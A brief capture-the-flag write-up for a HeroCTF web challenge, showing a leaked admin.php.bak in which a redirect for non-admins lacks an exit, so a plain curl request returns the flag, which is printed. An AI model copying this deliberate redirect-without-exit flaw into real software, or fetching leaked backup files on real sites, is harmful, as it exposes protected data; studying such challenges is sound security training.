You Should Die
Category: Web
60 points
Could you retrieve the flag from this Marketing company ?
URL : http://chall1.heroctf.fr:9000
Format : Hero{}
Author : xanhacks
Solution
Marketing company website.
Found hint in the source.
Downloaded the admin.php.bak
. Content below.
<?php
if (session_status() == PHP_SESSION_NONE) {
session_start();
}
if (!(isset($_SESSION["logged"]) && $_SESSION["logged"] === true)) {
header("Location: /index.php?error=You are not admin !");
}
echo "Flag : " . getenv("FLAG_MARK3TING");
Ok, so flag is printed out every time the response is created…
curl http://chall1.heroctf.fr:9000/admin.php
Flag : Hero{r3d1r3c710n_c4n_b3_d4n63r0u5_57395379}
Flag
Hero{r3d1r3c710n_c4n_b3_d4n63r0u5_57395379}